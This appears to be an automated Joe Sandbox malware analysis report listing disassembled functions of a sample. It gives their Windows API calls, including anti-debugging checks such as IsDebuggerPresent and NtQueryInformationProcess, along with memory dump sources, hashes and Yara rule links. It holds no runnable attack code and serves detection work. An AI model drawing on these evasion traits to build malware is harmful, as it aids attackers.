                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,00FE5504,?,?,?,?), ref: 00FF20A0
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00FF20AD
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF20B4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1871034439-0
                                                                                                                                                                                                                                                          • Opcode ID: 0e095bd95d15947043a1533677689bc1a9989160a28e9860d5bd0495e4d78de7
                                                                                                                                                                                                                                                          • Instruction ID: 0d82dd2ada663677a51fc604ea6ece1de4df9b425ab19705403ee0c6fded9d8d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e095bd95d15947043a1533677689bc1a9989160a28e9860d5bd0495e4d78de7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65011272500209BFDF118F65DC48DBE7BBEFF89360B148458F64593114DB319990EB60
                                                                                                                                                                                                                                                          Function 00FE8696 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86AE
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00FE6716,?), ref: 00FE86BC
                                                                                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86D2
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00FE6716,?), ref: 00FE86E1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4291131564-0
                                                                                                                                                                                                                                                          • Opcode ID: 5a6df078b6e508e40ccb15aaa28b7923b323899fb838df3f711ff1af4e82a9c8
                                                                                                                                                                                                                                                          • Instruction ID: 869889c2d88d74f918b98875af26187d23a89221afd45dcf11aa4b6692fb2963
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6df078b6e508e40ccb15aaa28b7923b323899fb838df3f711ff1af4e82a9c8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F0E7B4502235BFCB315F56DC4DE8B7EB9EF46BA0B104055FA09A6248D7714A40DBE1
                                                                                                                                                                                                                                                          Function 6CD58BE0 Relevance: 5.9, Strings: 4, Instructions: 941COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • __ZN, xrefs: 6CD59017
                                                                                                                                                                                                                                                          • ?, xrefs: 6CD5950D
                                                                                                                                                                                                                                                          • .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs, xrefs: 6CD58BF5
                                                                                                                                                                                                                                                          • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6CD59798
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$?$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                                                                                                                                                                                                                                          • API String ID: 0-2050174402
                                                                                                                                                                                                                                                          • Opcode ID: 1d1932b572241947f9a9dfa327ea69d8bc96ddb8d305dea106c7b3e40c544460
                                                                                                                                                                                                                                                          • Instruction ID: 93492f4e9dc18a0f8af67d203cde565cad3ee014c6f9964f35d3c8a8b587b742
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d1932b572241947f9a9dfa327ea69d8bc96ddb8d305dea106c7b3e40c544460
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 867248B29087109FDB14CF28C89076AB7E2EFC5314F998A1EF4E557AA1D331D856C782
                                                                                                                                                                                                                                                          Function 6CD50DE0 Relevance: 4.6, APIs: 3, Instructions: 83filenativesynchronizationCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • NtWriteFile.NTDLL ref: 6CD50E3F
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6CD50E4F
                                                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 6CD50E6F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3447438843-0
                                                                                                                                                                                                                                                          • Opcode ID: 7077ee6d81e59bf50dbe8db84c8383ed1445d5a7940bc71ecec999ff0ed92d65
                                                                                                                                                                                                                                                          • Instruction ID: 9f05440eb3c37927e060fe14177e5aa5a79d148ffb5b3a7d0ca5f50f9bb06e98
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7077ee6d81e59bf50dbe8db84c8383ed1445d5a7940bc71ecec999ff0ed92d65
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40319175608345AFE704CF14C850B9BBBE8EBC4358F108A1DF9A897390D774E9058BA6
                                                                                                                                                                                                                                                          Function 6CD66ACC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CD66BC4
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CD66BCE
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CD66BDB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: 5246371b182d02c6b961a1c57182a0be38da63a079a30d7d2cefbe7e6139f896
                                                                                                                                                                                                                                                          • Instruction ID: b969b9c7eb15bc1bee928ecac6262d9139b7e43e581cb3e88e2f2c3274456576
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246371b182d02c6b961a1c57182a0be38da63a079a30d7d2cefbe7e6139f896
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431C774901229EBCB21DF29D9887CCBBB8BF08314F5042EAE41CA7660E7709B85CF54
                                                                                                                                                                                                                                                          Function 6CD2B040 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • BCryptGenRandom.BCRYPT(00000000,?,?,00000002,00000000,?,00000007,?,6CD2AE46,?,?,?,?,6CD6E0E7,?,?), ref: 6CD2B058
                                                                                                                                                                                                                                                          • SystemFunction036.ADVAPI32(?,?,?,6CD2AE46,?,?,?,?,6CD6E0E7,?,?,00000020), ref: 6CD2B069
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CryptFunction036RandomSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1232939966-0
                                                                                                                                                                                                                                                          • Opcode ID: 39a5a60d86231a9446fabf94399db9ebad41b47e2a27a49d848b1fd0a81a38ea
                                                                                                                                                                                                                                                          • Instruction ID: 6515715f2953aca7d95d498d73fdcd6fcf4a8d4eb1a1122e9fd204f357692b05
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39a5a60d86231a9446fabf94399db9ebad41b47e2a27a49d848b1fd0a81a38ea
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67E09272202229BBF71006955C84F17FB9CDB8AAE9F120211FB2997091C5514C0002B4
                                                                                                                                                                                                                                                          Function 00FE144B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00FE145D
                                                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 00FE1464
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3953534283-0
                                                                                                                                                                                                                                                          • Opcode ID: f94b105bf49f23b237c4728aba8f259275543b90a5e703de664511a851e0b5ff
                                                                                                                                                                                                                                                          • Instruction ID: 30b299e81441166c6603fbeb31f3ee398800fb5d5f3081c6d6f7b586df676729
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f94b105bf49f23b237c4728aba8f259275543b90a5e703de664511a851e0b5ff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE01271A41304FBFB20DBA2DC0AB5A72ACA700759F108154B352E20C0D6B8EA04A765
                                                                                                                                                                                                                                                          Function 6CD39DF1 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: xn--
                                                                                                                                                                                                                                                          • API String ID: 0-2826155999
                                                                                                                                                                                                                                                          • Opcode ID: 53b2c889316cfb0762e67f361bbaa63c1169896d2a80ad70f007d046bc69508f
                                                                                                                                                                                                                                                          • Instruction ID: 0572f8387f4588f3ae3956b012497caaf5389e25a1f2844c55e24ef12a2e4453
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53b2c889316cfb0762e67f361bbaa63c1169896d2a80ad70f007d046bc69508f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28A246B1E052748AEF04CF94C8A07EDB7B1BF47308F18526AD49E7BAA1D3354985CB61
                                                                                                                                                                                                                                                          Function 6CD38E00 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                                          • Opcode ID: fe4136daf117cff46768517c689f90f7af7920e408ce8bdf3096aa9c4c2bf2e9
                                                                                                                                                                                                                                                          • Instruction ID: 8add5ad62ee8461369204c59f79e30dea443a1214105a6d97a3c350ced1e707c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe4136daf117cff46768517c689f90f7af7920e408ce8bdf3096aa9c4c2bf2e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E1B1716083618FC725CF28C8907ABB7E2EFC6304F45592EE5D99B7A1DB319845CB82
                                                                                                                                                                                                                                                          Function 6CD388A0 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                                          • Opcode ID: 10e617ae4d5cbc77c6b7dabd0ce70fa163320d21a6e2eaed9e393f95c3d77419
                                                                                                                                                                                                                                                          • Instruction ID: 31c7e885698634ce8e396a115c8aba90333b4ef4bcf24093b28d40848494e9fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10e617ae4d5cbc77c6b7dabd0ce70fa163320d21a6e2eaed9e393f95c3d77419
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06E1C271A083159FC724CF18CC916AAB7E6EFC6314F155A2FE89DD7660DB30A845CB82
                                                                                                                                                                                                                                                          Function 6CD6D735 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CD6D730,?,?,00000008,?,?,6CD6D333,00000000), ref: 6CD6D962
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
